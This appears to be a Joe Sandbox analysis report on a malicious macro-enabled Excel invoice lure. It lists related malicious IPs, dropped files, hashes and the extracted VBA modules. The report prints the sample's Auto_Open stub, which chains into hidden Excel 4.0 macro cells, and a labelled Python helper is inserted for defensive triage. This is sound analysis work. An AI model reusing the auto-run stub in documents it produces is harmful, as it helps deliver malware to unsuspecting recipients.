                                                                                                                                                t.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.141.27.225
                                                                                                                                                SSuPgxqQBv.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.36
                                                                                                                                                sGdpcwaC54.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                sGdpcwaC54.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                ccriZ1jd8H.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                SecuriteInfo.com.Trojan.GenericKD.36392080.3322.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.156
                                                                                                                                                0304_87496944093261.docGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                0304_56958375050481.docGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                Static.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                Static.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                msals.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                OVHFROutstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159
                                                                                                                                                New Order Request_0232147.exeGet hashmaliciousBrowse
                                                                                                                                                • 149.202.85.210
                                                                                                                                                Transcation03232016646pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 79.137.109.121
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                MZyeln5mSFOjxMx.exeGet hashmaliciousBrowse
                                                                                                                                                • 66.70.204.222
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                d192feb6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                7bc33f1c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                448b5d7d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                7bc33f1c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FAE18253-8CFD-4E3D-BC35-FFFD7833E115
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 134558
Entropy (8bit): 5.368388305180555
Encrypted: false
SSDEEP: 1536:ncQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:MEQ9DQW+zPXO8
MD5: 611EBE91BBBD99D355DAF81A6E7DCAC5
SHA1: 44F79E65DD2A30D69F880B4D29A1E8E5CAF3CC7C
SHA-256: 323A9C8BF4ACD185973F3370311B7DD38037A5B3F35685365E62B5D9207DE88F
SHA-512: A13838D119E7BC86BCC2AFCFFC721FC92FA590D52134D46B1921F42157315112EDEBC64143555172AF3553051967284266D44A1386C0BC67F9D9F013ED276350
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T17:16:05">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F689363C.jpg
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
Category: dropped
Size (bytes): 92379
Entropy (8bit): 7.654577060340879
Encrypted: false
SSDEEP: 1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
MD5: 4A425E6A5A885C0D0E2589506FD2244B
SHA1: E23482422480A4720E22F311B42BD65E2F3556F8
SHA-256: 76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
SHA-512: 3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Temp\23B10000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 119781
Entropy (8bit): 7.698563389587459
Encrypted: false
SSDEEP: 3072:P5RSrvKINbjvw548LMb/oqKO8NnS8+60Kcq:RR7AbT648LM7D98Np+Ep
MD5: A1936D6FBB3EB18E0050C0F1FC57DEE9
SHA1: 55066C92053957F35FCD3F79E821907C5DB8D2CE
SHA-256: 9B723BCE1BDFBDFC8A07C828D0BBBCE238963B06614620F6C120B50581FF8421
SHA-512: 8F61A4082960C743D43AF1F86BCA1A45A6C38EE000912E79C7DB843537528ECC416587E3CFB78F8403DF37AC7420B70C76C441ED53F9B2B9AD2A392B954296EA
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 170164
Entropy (8bit): 4.366501051489385
Encrypted: false
SSDEEP: 1536:fP5vvvzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:f1M8WpFpKKHHedydFeo+oQLUlPoK0
MD5: 10FC429A9AE4B5348B5F32F6FD4B2C1F
SHA1: F57A5A19E5534713CCC5F1B6170CD77EBBF27398
SHA-256: 0B4F03EFE87158E75D21F1C6BA744705BEEC40E8CA65FFFDFA48FEA69C85F05F
SHA-512: 0D6DC75CC26D9322F6502DAC1E83E24FB9D31C8E2DA0A6FCDC6FE798F8EF2CB6E14B6527BB5D43DE224686F137D46FC3CD39B7FAEED1D6ABDF694EB000A5137D
Malicious: false
Reputation: low
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed May 5 01:16:12 2021, atime=Wed May 5 01:16:12 2021, length=12288, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):904
                                                                                                                                                Entropy (8bit):4.668642985848694
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8QtXU9UMcuElPCH2agPXtSEsk+WrjAZ/2bDBLC5Lu4t2Y+xIBjKZm:8QrkgPIE7AZiD487aB6m
                                                                                                                                                MD5:E18822F992569E581ADAC8946F7EBAB3
                                                                                                                                                SHA1:E3B7DD4604B240FDEDCE9602CB99699C6BBA3B90
                                                                                                                                                SHA-256:A920432859070D159629558BE9BABD65D6B689028EE4EF6AA25065EF36CED62A
                                                                                                                                                SHA-512:97FC97862390CCD017F5AA714013BE86D6EE8FDFFC7689D78DBD6A72B033E66314F57F43E19575D5BCE585327B6D82BCBED60D859E5C9DD5F41DB770FEC1EDF1
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F........N....-.....TA...'.TA...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qzx..user.<.......Ny..R.......S....................Y...h.a.r.d.z.....~.1......R....Desktop.h.......Ny..R.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......468325...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-1840996632-05042021.xlsm.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:47 2020, mtime=Wed May 5 01:16:12 2021, atime=Wed May 5 01:16:12 2021, length=119775, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2380
                                                                                                                                                Entropy (8bit):4.713963947501717
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:82VkgP5OZ6EyA/ujZ64DaOS+7aB6my2VkgP5OZ6EyA/ujZ64DaOS+7aB6m:82fu64/W6FOS3B6p2fu64/W6FOS3B6
                                                                                                                                                MD5:F2F8E7CD5F81F1791686F7617E59CB0F
                                                                                                                                                SHA1:62AB1A77C81F24EAAD06C80B724F809E5F8641EC
                                                                                                                                                SHA-256:CE497CBEC83B032A2DD5371E6742B674E5A13E3C439179865EE6A83174A58597
                                                                                                                                                SHA-512:04BDAB6927C09A353C123339B9B9F1A8B00BF8E90655C3474D6360837DEB7FDC98FF6797396215669FD4668FA973A1D6FE09167C25C6FADCB44A1F8D5FFB5A56
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ....b0.:....N.TA...N.TA...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qzx..user.<.......Ny..R.......S....................Y...h.a.r.d.z.....~.1.....>Q{x..Desktop.h.......Ny..R.......Y..............>.......|.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....R.. .OUTSTA~1.XLS.........>Qxx.R......h........................O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.8.4.0.9.9.6.6.3.2.-.0.5.0.4.2.0.2.1...x.l.s.m.......o...............-.......n...........>.S......C:\Users\user\Desktop\Outstanding-Debt-1840996632-05042021.xlsm..@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.8.4.0.9.9.6.6.3.2.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......468325...........!a..%.H.VZAj...&..-.........-..!a..%.H.VZAj...&..-.........-.............1SPS.XF.L8C
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):178
                                                                                                                                                Entropy (8bit):5.000732257117073
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomxWhl2BbmXIVa+lpSyEW92BbmXIVa+lpSmxWhl2BbmXIVa+lpSv:djSl2poW92psl2pc
                                                                                                                                                MD5:BAD8EE5236230B561F4D4C3E161F2F6D
                                                                                                                                                SHA1:CFDE56C8A01AEE7B9849E2124CED0759E25665D4
                                                                                                                                                SHA-256:A5781EF8F9A091159A6E15E4177F54FB91950789620877C148DBF6F7E574C072
                                                                                                                                                SHA-512:9FCFBDD052FFECCF43F265E4F67E15D98F2339EDAFF22EDC5F9AA30077D8456D198E76E27F6B11695E36DE9687F01D6766E192F82DA5183214EB048E57B318AD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-1840996632-05042021.xlsm.LNK=0..Outstanding-Debt-1840996632-05042021.xlsm.LNK=0..[misc]..Outstanding-Debt-1840996632-05042021.xlsm.LNK=0..
                                                                                                                                                C:\Users\user\Desktop\E3B10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119775
                                                                                                                                                Entropy (8bit):7.699257049186271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:x88vKINbjvw548LMb/oqKO8NnS8+60KcC:xGAbT648LM7D98Np+Ed
                                                                                                                                                MD5:9B1EEE67A8B8894E0461820241EB8B83
                                                                                                                                                SHA1:3F9CB90972FE2A97D4268E44EF1061F7728DEEE2
                                                                                                                                                SHA-256:BB783D326EA45620B2FDD44F1DBACDA095361BF6E8130625BC1BA4522C204091
                                                                                                                                                SHA-512:E224CEDC7D413FFA6474D2E055D771DC96B88A89E248877751D7D40B932BEAE76E830BBAC014C0149D81990A2165696C1F5514B577396E81DDEB5CCEEFDA8D86
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\Desktop\~$Outstanding-Debt-1840996632-05042021.xlsm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.688088272020875
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                File name:Outstanding-Debt-1840996632-05042021.xlsm
                                                                                                                                                File size:116888
                                                                                                                                                MD5:0276be45120eeb640587451db55759cb
                                                                                                                                                SHA1:51424cff72ecb039f78d5005a03ec2882a96d7dd
                                                                                                                                                SHA256:06c9a8f5da75ebc77f7528ceb2797050ba17cc2c7e36467b0d259d4f48dbbcbf
                                                                                                                                                SHA512:588441fa0cc28dc18ff0ebc51f40ecba27012125ccedff3866b75d717e8360c19149ed75f0bf83027088e1789b4228a0f5810c94c60c06ff0d4bbb6bb1da4a2c
                                                                                                                                                SSDEEP:3072:zvKINbjvw548LMb/oqKO8NnS8+60KcplBO:+AbT648LM7D98Np+EeK
                                                                                                                                                File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/404162/sample/Outstanding-Debt-1840996632-05042021.xlsm"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Author:Rabota
                                                                                                                                                Last Saved By:Noped
                                                                                                                                                Create Time:2015-06-05T18:19:34Z
                                                                                                                                                Last Saved Time:2021-05-04T08:05:25Z
                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                Shared Document:false
                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                Application Version:16.0300

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Blasr.bas, Stream Size: 1166
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Blasr
                                                                                                                                                VBA File Name:Blasr.bas
                                                                                                                                                Stream Size:1166
                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                "Blasr"
                                                                                                                                                Application.Run
                                                                                                                                                Attribute
                                                                                                                                                Auto_Open()
                                                                                                                                                VB_Name
                                                                                                                                                Private
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Blasr"
                                                                                                                                                Private Sub Auto_Open()
                                                                                                                                                Application.Run Sheets("Nyukasl").Range("AJ6")
                                                                                                                                                
                                                                                                                                                Application.Run Sheets("Nyukasl").Range("A5")
                                                                                                                                                Application.Run Sheets("Nyukasl").Range("A5")
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                End Sub
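The Blasr module above is the only one of the extracted modules that contains executable statements. Its Auto_Open procedure does not download or run anything itself: each `Application.Run Sheets("Nyukasl").Range(...)` call hands control to a cell on a sheet named Nyukasl, which is the standard way a small VBA stub chains into Excel 4.0 (XLM) macro formulas kept on a separate macro sheet, usually one the workbook marks hidden or very hidden. The other modules listed below (Briks, Byutut, Class1 to Class3, Kikide, UserForm1) hold only Attribute lines; their VB_Base GUIDs identify Briks as a Worksheet object (00020820), Kikide as the Workbook object (00020819) and Class1 to Class3 as ordinary class modules (FCFB3D2A), none carrying code. The Python helper below is an added triage example, not part of the Joe Sandbox report or of the sample. It takes decompressed VBA module text (the Blasr and Briks bodies printed in this report are embedded as constructed input), lists auto-execute entry points, flags attribute-only shells, and returns the (sheet, cell) pairs handed to Application.Run from an auto-exec procedure, which are the XLM cells an analyst should dump next.

```python
import re
from dataclasses import dataclass, field

# Procedure names Office invokes automatically once macros are enabled.
AUTO_EXEC = {
    "auto_open", "auto_close", "auto_exec",
    "workbook_open", "workbook_beforeclose", "workbook_activate",
    "document_open", "document_close",
}

# One Sub/Function with its body, e.g. "Private Sub Auto_Open() ... End Sub".
PROC = re.compile(
    r"^[ \t]*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)[^\n]*\n"
    r"(.*?)^[ \t]*End\s+(?:Sub|Function)",
    re.IGNORECASE | re.MULTILINE | re.DOTALL,
)
# Application.Run Sheets("Nyukasl").Range("AJ6")  ->  ("Nyukasl", "AJ6")
# Only the Sheets("...").Range("...") form used by this sample is covered.
RUN_TARGET = re.compile(
    r'Application\.Run\s+Sheets\("([^"]+)"\)\.Range\("([^"]+)"\)',
    re.IGNORECASE,
)


@dataclass
class ModuleTriage:
    name: str
    attribute_only: bool                               # only "Attribute ..." lines
    entry_points: list = field(default_factory=list)   # auto-exec procedures found
    run_targets: list = field(default_factory=list)    # (procedure, sheet, cell)


def triage_module(name: str, source: str) -> ModuleTriage:
    """Summarise one decompressed VBA module for VBA-to-XLM bridge triage."""
    code = [ln for ln in source.splitlines()
            if ln.strip() and not ln.strip().lower().startswith("attribute ")]
    t = ModuleTriage(name, attribute_only=not code)
    for m in PROC.finditer(source):
        proc, body = m.group(1), m.group(2)
        if proc.lower() in AUTO_EXEC:
            t.entry_points.append(proc)
        for sheet, cell in RUN_TARGET.findall(body):
            t.run_targets.append((proc, sheet, cell))
    return t


def xlm_entry_cells(modules: dict) -> list:
    """Ordered, de-duplicated (sheet, cell) pairs that an auto-exec procedure
    hands to Application.Run: these are the XLM formula cells to dump next."""
    seen, ordered = set(), []
    for name, src in modules.items():
        t = triage_module(name, src)
        for proc, sheet, cell in t.run_targets:
            if proc in t.entry_points and (sheet, cell) not in seen:
                seen.add((sheet, cell))
                ordered.append((sheet, cell))
    return ordered


# Constructed input: the two module bodies exactly as printed in this report.
BLASR = '''Attribute VB_Name = "Blasr"
Private Sub Auto_Open()
Application.Run Sheets("Nyukasl").Range("AJ6")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")
End Sub
'''

BRIKS = '''Attribute VB_Name = "Briks"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'''

if __name__ == "__main__":
    modules = {"Blasr": BLASR, "Briks": BRIKS}
    for name, src in modules.items():
        t = triage_module(name, src)
        kind = "attribute-only shell" if t.attribute_only else "code-bearing"
        print(f"{name}: {kind}; entry points {t.entry_points}; "
              f"Application.Run targets {t.run_targets}")
    print("XLM cells to inspect:", xlm_entry_cells(modules))
```

The RUN_TARGET pattern covers only the `Sheets("...").Range("...")` form seen here; Application.Run also accepts a plain string such as `"Nyukasl!AJ6"` or a defined name, so extend the pattern before relying on it as a detection. The returned cells are Excel 4.0 formulas, not VBA, so the next step is an XLM-aware extractor run against the macro sheet rather than further VBA decompilation.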
                                                                                                                                                VBA File Name: Briks.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Briks
                                                                                                                                                VBA File Name:Briks.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: False, VB_Exposed, Attribute, "Briks", VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Briks"
                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                VBA File Name: Byutut.bas, Stream Size: 1056
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Byutut
                                                                                                                                                VBA File Name:Byutut.bas
                                                                                                                                                Stream Size:1056
                                                                                                                                                Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: Attribute, VB_Name, "Byutut"
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Byutut"
                                                                                                                                                VBA File Name: Class1.cls, Stream Size: 1151
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class1
                                                                                                                                                VBA File Name:Class1.cls
                                                                                                                                                Stream Size:1151
